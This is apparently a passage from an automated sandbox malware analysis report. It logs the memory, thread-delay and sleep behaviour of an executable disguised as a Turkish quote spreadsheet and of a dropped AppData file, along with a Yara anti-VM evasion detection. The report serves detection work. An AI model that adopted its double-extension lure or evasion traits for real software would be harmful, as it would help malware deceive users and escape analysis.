Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 5664, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: OnCgVRIhY.exe PID: 7472, type: MEMORYSTR

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 27D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 29C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 27D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 7AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 8AA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 8C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 9C60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 1610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 3040000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Memory allocated: 2E30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Memory allocated: 2B30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Memory allocated: 2CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Memory allocated: 4CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Memory allocated: 7A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Memory allocated: 8A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Memory allocated: 8BB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Memory allocated: 9BB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Memory allocated: 14B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Memory allocated: 2F60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Memory allocated: 4F60000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599543	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599203	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597448	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596780	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596438	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596313	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595750	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595422	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594512	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594281	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594172	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 594062	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 593953	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Thread delayed: delay time: 593844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 599860
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 599750
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 599641
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 599516
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 599406
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 599297
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 599188
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 599063
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 598938
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 598691
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 598563
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 598344
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 598125
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 598016
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597469
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597359
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597141
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 597016
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596891
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596781
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596672
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596562
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596453
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596344
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596229
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596110
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 595891
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 595766
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 595641
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 595313
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 595188
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 595063
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 594953
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 594844
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 594719
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 594609
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 594500
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 594389
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Thread delayed: delay time: 594281

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7908	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1623	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7776	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1141	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Window / User API: threadDelayed 2604	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Window / User API: threadDelayed 7232	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Window / User API: threadDelayed 2192
Source: C:\Users\user\AppData\Roaming\OnCgVRIhY.exe	Window / User API: threadDelayed 7652

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7096	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7480	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7484	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7456	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7968	Thread sleep count: 2604 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -599891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7968	Thread sleep count: 7232 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -599543s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -599313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -599203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -597448s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -597312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -596780s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -596656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -596547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -596438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -596313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -595859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -595750s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -595641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe TID: 7964	Thread sleep time: -595531s >= -30000s	Jump to behavior
